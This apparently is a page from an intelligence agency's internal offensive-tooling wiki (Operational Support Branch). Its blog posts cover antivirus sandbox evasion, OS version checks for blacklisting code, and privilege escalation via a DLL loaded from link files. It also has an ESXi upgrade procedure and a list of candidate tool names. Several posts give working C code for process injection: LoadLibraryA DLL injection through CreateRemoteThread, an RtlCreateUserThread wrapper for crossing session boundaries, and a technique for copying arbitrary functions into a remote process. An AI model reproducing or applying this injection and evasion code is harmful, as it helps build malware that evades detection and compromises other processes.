Owner: User #1179751

Operational Support Branch (OSB)

Attachments:

• The_Mystery_of_Duqu_2_0_a_sophisticated_cyberespionage_actor_returns.pdf

• OSB

Blog posts:

• [User #1179925]: Opportunistic Locks Used For Sandbox Defeat TOCTOU

  Just finished writing up some info on something I hadn't heard about before starting this project. Opportunistic locks are pretty cool. Check it out here: Opportunistic Locks SECRET

• [User #1179925]: Duqu 2.0 Kaspersky Write-Up

   

  ('viewpdf' missing)

   

  The_Mystery_of_Duqu_2_0_a_sophisticated_cyberespionage_actor_returns.pdf

• [User #1179925]: An overly simple PSPPersonal Security Product (Anti-Virus) Sandbox defeat

  So, in playing with the PSPPersonal Security Product (Anti-Virus) Evasion challenge in the Capture The Flag/New Developer Exercises, I had an idea. So a PSPPersonal Security Product (Anti-Virus) sandbox often emulates most of the function calls by the program in question in an attempt to evaluate deeper code paths (to determine that actual intent of the program). Most sandboxes are pretty advanced and most timing defeats have been mitigated in most PSPs. The idea I had was simply to test how detailed the actual sandbox was. In the challenge, I had made an executable that was being caught by the Windows Defender sandbox. To defeat the sandbox I first created a file and closed the handle. I then checked to see if the file still existed after I had created the file. The sandboxes themselves don't actually ever create a  real file. To pass this defeat the PSPPersonal Security Product (Anti-Virus) would have to keep a virtual collection of files that I had created and respond appropriately. Although, Windows Defender is a simple example, techniques of this nature may be useful in many PSPs.

• [User #1179925]: When Windows Lies, Continued... (Trust Issues++)

  If you go to MSDNMicrosoft Developer Network and look at the OSVERSIONINFO structure, Microsoft has a nice little table to use to identify the version of the Windows Operating System. Underneath the table there is a note stating that Windows 8.1 will tell you that it is Windows 8. Ok, weird, but at least it's a documented lie (that's alright I guess?). Windows 10 however, is listed as Major = 10 Minor = 0. Awesome. Awesome until it isn't. Not on all builds of the Technical Preview. In fact, you will notice the Windows 10 VMs on DARTTest-Software (commercial) are not 10.0 but rather 6.4 (major.minor). So, keep that in mind if trying to blacklist parts of code when executing DARTTest-Software (commercial) scripts.

• [User #71473]: A little bit more CreateRemoteThread

  Crossing Session Boundaries

  CreateRemoteThread on Windows Vista and Windows 7 (and by extension Windows 2008 Server and Windows 2008 Server R2) will not work across session boundaries.  To work around this, use RtlCreateUserThread.  Windows 8, 8.1 and 10 remove this restriction, but RltCreateUserThread also works on those platforms, so its fielder's choice as to whether you want lots of version checks or just use RtlCreateUserThread across the board.  However, you definitely want to exclude XPWindows operating system (Version) – RtlCreateUserThread behaves badly on XPWindows operating system (Version) and will cause the target process to hang indefinitely with a full CPU core.

  Here's a nice little wrapper that makes it easy to fire and forget
  
  

  typedef struct _CLIENT_ID
  {
      PVOID UniqueProcess;
      PVOID UniqueThread;
  } CLIENT_ID, *PCLIENT_ID;
   
  typedef long(WINAPIWindows Application Programming Interface *_RtlCreateUserThread)(
      HANDLE,
      PSECURITY_DESCRIPTOR,
      BOOLEAN,
      ULONG,
      PULONG,
      PULONG,
      PVOID,
      PVOID,
      PHANDLE,
      PCLIENT_ID);
   
  HANDLE MyCreateRemoteThread(
      __in      HANDLE hProcess,
      __in_opt  LPSECURITY_ATTRIBUTES lpThreadAttributes,
      __in      SIZE_T dwStackSize,
      __in      LPTHREAD_START_ROUTINE lpStartAddress,
      __in_opt  LPVOID lpParameter,
      __in      DWORD dwCreationFlags,
      __out_opt LPDWORD lpThreadId
      )
  {
      HANDLE hThread = NULL;
   
      // Don't use RtlCreateUserThread on XPWindows operating system (Version) it runs away with the CPU
      OSVERSIONINFO osvi;
      BOOL bIsWindowsXP;
   
      SecureZeroMemory(&osvi, sizeof(OSVERSIONINFO));
      osvi.dwOSVersionInfoSize = sizeof(OSVERSIONINFO);
   
      GetVersionEx(&osvi);
   
      bIsWindowsXP = (osvi.dwMajorVersion == 5 && osvi.dwMinorVersion >= 1);
   
      if (bIsWindowsXP)
      {
          hThread = CreateRemoteThread(hProcess, lpThreadAttributes, dwStackSize, lpStartAddress, lpParameter, dwCreationFlags, lpThreadId);
      }
      else
      {
          _RtlCreateUserThread RtlCreateUserThread;
          CLIENT_ID cid = { 0 };
   
          WCHAR wszNtDll[] = L"ntdll.dll";
          CHAR szRtlCreateUserThread[] = "RtlCreateUserThread"
   
          HMODULE hModNtDll = GetModuleHandle(wszNtDll);
   
          RtlCreateUserThread = (_RtlCreateUserThread)GetProcAddress(hModNtDll, szRtlCreateUserThread);
          RtlCreateUserThread(hProcess, NULL, false, 0, 0, 0, lpStartAddress, lpParameter, &hThread, &cid);
      }
      return hThread;
  }
   

   

  Injecting Non-thread Functions

   

  The one drawback to CreateRemoteThread is you can't use it to call just any old function in a remote process – the function you call must already exist in the other process and it must have a compatible signature to LPTHREAD_START_ROUTINE.  Fortunately, you can use some compiler tricks to work around both of these limitations.  To call APIApplication Programming Interface functions that don't match the Thread function signature, you can make a local function that wraps any call you'd like to make and then write that function into the remote process.  The local function should take a structure containing the arguments for the APIApplication Programming Interface call.

  You can also add completely new code to the remote process this way without having to inject a whole DLL.  Wanna crash something?  Just write a function into the remote process that divides by zero.

   

  // WARNING:  Crazy compiler voodoo ahead!
   
  // turn off incremental linking -- should force this to *not* use a jump table
  #pragma comment(linker, "/incremental:no")
  // turn off optimizations
  #pragma optimize( "", off )
  // turn off pesky runtime checks that add an extra call to _RTC_CheckEsp to the end of our function
  #pragma runtime_checks( "", off)
  // put both functions in the same section.  as long as there are only two, they should be in order
  #pragma code_seg( ".text$A" )
  extern "C"
  {
      static DWORD WINAPIWindows Application Programming Interface DivideByZero(PVOID value)
      {
          // multiplying 0 * 0 turns the line below into a mere warning instead of a compiler error
          return (DWORD)value / (0 * 0);
      }
   
      static void __stdcall DivideByZero_end()
      {
      }
  };
  #pragma code_seg()
  #pragma runtime_checks ("", restore)
  #pragma optimize( "",on )
   
  SIZE_T funcSize = (SIZE_T)DivideByZero_end - (SIZE_T)DivideByZero; 

   

  Then just use VirtualAllocEx and WriteProcessMemory to copy your function into the remote process, and use MyCreateRemoteThread to call it.

   

   

• [User #4849738]: Updating ESXi Server from 5.5-6.0.0

  1. Ensure no one is currently utilizing the shellterm, pocket putin, etc.
  2. Alert IRCInternet Relay Chat users that the service is going down
  3. Suspend all VMs
  4. Put into maintenance mode
  5. Reboot
  6. Change BIOSBasic Input/Output System boot settings from UEFIUniversal Extendible Firmware Interface to BIOSBasic Input/Output System boot, and disable all boot devices aside from the USBUniversal Serial Bus CDCompact Disk drive
  7. Insert new ESXi BOOTABLE CDCompact Disk into drive, and boot
  8. Updater prompts for update or new install... UPDATE! (takes 10-15 minutes)
  9. After update, change boot settings back to UEFIUniversal Extendible Firmware Interface and boot.
  10. If applicable, download new vSphere Client
  11. Log into vSphere Client as root
      
      1. Configuration -> Authentication Services > Re-add DEVLAN.net Active Directory
      2. Permissions->Add Permissions->Add
         1. Type in search menu "osb", and select sg-osb
         2. Grant sg-osb the "OSB" assigned role
         3. Grant User #72251, User #?, and User #1179751 "Administrator" role
      3. Configuration -> Storage
         1. unmount oldmirror and REPO
         2. Re-add:

         3. [root@osb:~] esxcli storage nfs list
            Volume Name Host Share Accessible Mounted Read-Only isPE Hardware Acceleration
            ---------------------------- ------------------ -------------------- ---------- ------- --------- ----- ---------------------
            REPO (All install ISOs here) repo.devlan.net /SANLUN2 false false true false Unknown
            oldmirror mirrors.devlan.net /vol/vol1/oldmirrors false false true false Unknown

• [User #1179925]: ClipArt

   

  I was in the process of creating documentation and slides for a tool when I realized that the office clip art was lacking for what I needed in a diagram. Thus, I went to the webz and downloaded a few that may be useful to more than just my project. If you would like to seem them I threw them into \\FS-01\share\ClipArt. Enjoy!

• [User #1179925]: A little bit of CreateRemoteThread

  CHAR cDll[] = "C:\\Users\\User #?\\Desktop\\MyDll.dll";
   
  int iPID = _wtoi(argv[1]);
   
  HANDLE hProc = OpenProcess(PROCESS_ALL_ACCESS, FALSE, iPID);
  if (hProc == NULL)
       printf("Could not get handle to process %d\n", iPID);
   
  LPVOID addr = (LPVOID)GetProcAddress(GetModuleHandle(L"kernel32.dll"), "LoadLibraryA");
  if (!addr)
  	printf("Failed to get load library function\n");
   
  LPVOID arg = (LPVOID)VirtualAllocEx(hProc, NULL, strlen(cDll), MEM_RESERVE | MEM_COMMIT, PAGE_READWRITE);
  if (!arg)
  	printf("Failed to allocate memory\n");
   
  int n = WriteProcessMemory(hProc, arg, cDll, strlen(cDll), NULL);
  if (!n)
  	printf("Failed to write memory\n");
   
  HANDLE threadID = CreateRemoteThread(hProc, NULL, 0, (LPTHREAD_START_ROUTINE)addr, arg, NULL, NULL);
  if (threadID == NULL)
  	printf("Error failed to create remote thread\n");
  else
  	printf("Success!!\n");
  
  CloseHandle(hProc);
   
  return 0;

• [User #1179925]: Network Share Operations With Privilege Escalation

  Just a reminder, since we ran into this little issue late in the night (User #71473 and User #14588054). In a network share operation, we were using the link files to load a dll into explorer. The dll once loaded would restart itself with a SYSTEM instance of rundll32. At that point it appeared the rundll32 had initialized but wasn't doing anything. It took us probably too long to figure out that when the SYSTEM process tries to access the share, it doesn't have the appropriate credentials. The credentials of the user you are running as are used when authenticating file operations to the share.

• [User #1179925]: Possible Tool Names

  Some tool names I'm writing down from an online generator so I have them stored somewhere.

   

  Reformed Renegade

  Hilltop Savages

  Gloating Gerbil

  Cliff Maulers

  Wannabee

  Death Phobia

  Latin Tornado??

  Postal Toddler

  Enraged Jackal

  Landworm

  Free Apocalypse

  Tundra Storm

  Bacon Gambler

  Cat Kittens

  Night Farmer

  Midnight Spawn

  Gothic Gnome

  Lazy Outlaw

  Awful Aftermath

  Karma Threat

  Dancing Hyena

  Goat Wrangler

  Holy Roller

Home pages:

• Duqu 2.0 Kaspersky Write-Up
• Time Stomper
• Munge Payload
• Fight Club
• Rain Maker Temp User Guide
• Rain Maker Version Archive
• System Monitoring and Manipulation
• Dancefloor - Linux
• Jukebox - Mac
• Bartender - Windows
• Margarita v1.6 User Guide
• OSBTest
• OSB Home